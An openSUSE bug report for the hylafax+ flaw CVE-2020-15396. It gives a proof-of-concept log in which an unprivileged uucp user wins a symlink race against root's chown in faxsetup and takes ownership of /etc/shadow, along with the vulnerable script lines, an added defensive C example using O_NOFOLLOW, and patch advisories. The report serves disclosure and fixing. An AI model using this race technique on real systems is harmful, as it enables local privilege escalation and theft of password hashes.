Bugzilla – Bug 1173521
VUL-0: CVE-2020-15396: hylafax+: Chown as root in user controlled directories allows for privilege escalation
Last modified: 2020-09-18 16:50:49 UTC
POC:

sh-5.0$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp),54(lock) context=unconfined_u:unconfined_r:unconfined_t:s0
sh-5.0$ pwd
/var/spool/hylafax/etc
sh-5.0$ ls -l /etc/shadow
-rw-r-----. 1 root shadow 1247 Jun 9 08:46 /etc/shadow
sh-5.0$ /tmp/poc .
# now while this poc is running start faxsetup as root
[+] watching .
[+] unlinked access log
[+] added link
-rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] skipping link setup.tmp
-rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] added link
-rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] skipping link Fontmap.HylaFAX
-rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] added link
-r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] skipping link setup.cache
-r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] added link
-r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow
[+] skipping link config
-r--r--r--. 1 uucp shadow 1.3K Jun 9 08:46 /etc/shadow

/etc/shadow is now owned by uucp

The issue is here in setupfax

2392 $CHOWN $faxUID $CONFIG; $CHGRP $faxGID $CONFIG
2393 $CHMOD 644 $CONFIG

$CONFIG is created, but in a directory where uucp can unlink it and exchange it with a symlink to /etc/shadow. Doing this via inotify is 100% stable on my system.

Indirectly fixed by the changed permissions in https://sourceforge.net/p/hylafax/HylaFAX+/2534/
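The report above describes root running chown/chmod by path inside a directory that uucp can modify. As an added example (not part of the bug report and not HylaFAX+ code), this C program shows the descriptor-based alternative: open the entry with O_NOFOLLOW, inspect it, then change owner and mode on that descriptor. The names set_owner_nofollow and demo, and the scratch directory, are hypothetical and constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not HylaFAX+ code: set owner and mode of `name` inside
 * directory `dirfd` through a file descriptor, never through the path again. */
int set_owner_nofollow(int dirfd, const char *name, uid_t uid, gid_t gid, mode_t mode)
{
    /* O_NOFOLLOW: symlink as last component -> ELOOP. O_NONBLOCK: a FIFO cannot stall us. */
    int fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    int rc = -1, err = 0;
    if (fstat(fd, &st) != 0)
        err = errno;
    else if (!S_ISREG(st.st_mode) || st.st_nlink != 1)
        err = EPERM;   /* not a plain file, or hard-linked elsewhere: refuse */
    else if (fchown(fd, uid, gid) != 0 || fchmod(fd, mode) != 0)
        err = errno;
    else
        rc = 0;        /* both calls acted on the inode that was inspected */
    close(fd);
    errno = err;
    return rc;
}

/* Constructed demo: scratch directory holding a regular file "config" and a symlink
 * "swapped" that points at it. Reports errno for the symlink and the file's final mode. */
int demo(int *link_errno, mode_t *file_mode)
{
    char dir[] = "/tmp/nofollow-demo-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    int fd = openat(dfd, "config", O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (dfd < 0 || fd < 0 || symlinkat("config", dfd, "swapped") != 0) return -1;
    close(fd);
    int r = set_owner_nofollow(dfd, "swapped", getuid(), getgid(), 0644);
    *link_errno = (r == -1) ? errno : 0;
    struct stat st;
    if (set_owner_nofollow(dfd, "config", getuid(), getgid(), 0644) != 0 ||
        fstatat(dfd, "config", &st, AT_SYMLINK_NOFOLLOW) != 0) return -1;
    *file_mode = st.st_mode & 07777;
    unlinkat(dfd, "swapped", 0);
    unlinkat(dfd, "config", 0);
    close(dfd);
    rmdir(dir);
    return 0;
}
```

This only protects the final path component; the directory itself still has to be reached safely, which is why the permission change referenced in the report (a directory the unprivileged user cannot rewrite) addresses the root cause.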
I have submitted https://build.opensuse.org/request/show/825727 containing hylafax 7.0.3 - this should contain the remaining fixes

@Johannes - please review and close bug if satisfied
This is an autogenerated message for OBS integration:
This bug (1173521) was mentioned in
https://build.opensuse.org/request/show/825731 Factory / hylafax+
https://build.opensuse.org/request/show/825733 15.2 / hylafax+
https://build.opensuse.org/request/show/825734 15.1 / hylafax+
openSUSE-SU-2020:1209-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References:
Sources used:
openSUSE Leap 15.2 (src): hylafax+-7.0.3-lp152.3.6.1
openSUSE-SU-2020:1210-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References:
Sources used:
openSUSE Leap 15.1 (src): hylafax+-7.0.3-lp151.4.6.1
openSUSE-SU-2020:1231-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References:
Sources used:
openSUSE Backports SLE-15-SP1 (src): hylafax+-7.0.3-bp151.6.4.1
fixed, thank you
openSUSE-SU-2020:1438-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References:
Sources used:
openSUSE Backports SLE-15-SP2 (src): hylafax+-7.0.3-bp152.3.4.1